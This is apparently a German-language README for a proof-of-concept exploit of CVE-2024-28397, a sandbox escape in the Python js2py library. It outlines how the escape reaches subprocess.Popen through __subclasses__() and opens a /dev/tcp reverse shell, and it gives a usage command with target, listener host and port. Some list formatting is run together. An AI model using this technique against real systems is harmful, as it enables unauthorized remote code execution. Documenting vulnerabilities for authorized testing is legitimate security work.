
Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2024-28397, eine Schwachstelle in der js2py-Bibliothek, die einen Sandbox-Escape ermöglicht, um eine Remote-Code-Ausführung zu erreichen.
Beschreibung
Dieses Repository enthält einen Python-basierten Proof of Concept (PoC) für CVE-2024-28397, eine Sandbox-Escape-Schwachstelle im Js2Py-JavaScript-Interpreter für Python. Wenn die Zielanwendung nicht vertrauenswürdigen JS-Code über Js2Py auswertet, kann ein Angreifer die Sandbox umgehen und beliebigen Python-Code ausführen. Dies kann genutzt werden, um Remote-Code-Ausführung (RCE) und eine Reverse Shell auf dem angreifbaren System zu erlangen.
Dieser Exploit wurde von Marven11’s CVE-2024-28397-js2py-Sandbox-Escape Projekt inspiriert.
Haftungsausschluss
Dieses Skript wird ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests bereitgestellt. Die unbefugte Nutzung dieses Skripts gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis haben, ist illegal und unethisch. Der Autor übernimmt keine Verantwortung für Missbrauch oder durch dieses Skript verursachte Schäden.
Über die Schwachstelle
__class__.__base__.__subclasses__, was zur Ausführung beliebigen Codes führt.Funktionen
Anforderungen
requests-Modul (pip install requests)/dev/tcp Reverse Shell)Verwendung
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
--target: Die vollständige URL zum anfälligen Web-App-Endpunkt--lhost: Ihre lokale IP-Adresse (für Reverse Shell verwendet)--lport: Ihr lokaler Port zum Empfangen der ShellFunktionsweise
__class__.__base__.__subclasses__(), um subprocess.Popen zu finden.Popen, um die Shell zu decodieren und auszuführen.